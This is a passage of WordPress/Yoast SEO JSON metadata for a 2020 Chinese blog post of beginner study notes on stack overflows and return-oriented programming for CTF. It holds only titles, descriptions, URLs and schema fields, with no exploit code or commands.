-->","yoast_head_json":{"title":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog","description":"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/mnihyc.com\/blog\/archives\/1501","og_locale":"zh_CN","og_type":"article","og_title":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s Blog","og_description":"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c 
\u5f00\u59cbpwn","og_url":"https:\/\/mnihyc.com\/blog\/archives\/1501","og_site_name":"mnihyc&#039;s Blog","article_published_time":"2020-05-07T19:27:41+00:00","article_modified_time":"2020-05-08T10:04:17+00:00","og_image":[{"url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","type":"","width":"","height":""}],"author":"mnihyc","twitter_card":"summary_large_image","twitter_creator":"@mnihyc","twitter_site":"@mnihyc","twitter_misc":{"\u4f5c\u8005":"mnihyc","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"2 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#article","isPartOf":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501"},"author":{"name":"mnihyc","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"headline":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55","datePublished":"2020-05-07T19:27:41+00:00","dateModified":"2020-05-08T10:04:17+00:00","mainEntityOfPage":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501"},"wordCount":269,"commentCount":0,"publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"image":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","articleSection":["\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/mnihyc.com\/blog\/archives\/1501#respond"]}]},{"@type":"WebPage","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501","url":"https:\/\/mnihyc.com\/blog\/archives\/1501","name":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55 - mnihyc&#039;s 
Blog","isPartOf":{"@id":"https:\/\/mnihyc.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage"},"image":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","datePublished":"2020-05-07T19:27:41+00:00","dateModified":"2020-05-08T10:04:17+00:00","description":"\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9\u6808\u6ea2\u51fa\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002 \u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08 &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u9884\u5907\u77e5\u8bc6 \u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236 \u51fd\u6570\u7684\u6808\u64cd\u4f5c \u5f00\u59cbpwn","breadcrumb":{"@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/mnihyc.com\/blog\/archives\/1501"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#primaryimage","url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png","contentUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png"},{"@type":"BreadcrumbList","@id":"https:\/\/mnihyc.com\/blog\/archives\/1501#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/mnihyc.com\/blog"},{"@type":"ListItem","position":2,"name":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP 
\u5b66\u4e60\u8bb0\u5f55"}]},{"@type":"WebSite","@id":"https:\/\/mnihyc.com\/blog\/#website","url":"https:\/\/mnihyc.com\/blog\/","name":"mnihyc&#039;s Blog","description":"Welcome!","publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/mnihyc.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751","name":"mnihyc","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","caption":"mnihyc"},"logo":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/comments?post=1501"}],"version-history":[{"count":0,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1501\/revisions"}],"wp:attachment":[{"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/media?parent=1501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/c
ategories?post=1501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0self.mnihyc.com\/blog\/wp-json\/wp\/v2\/tags?post=1501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}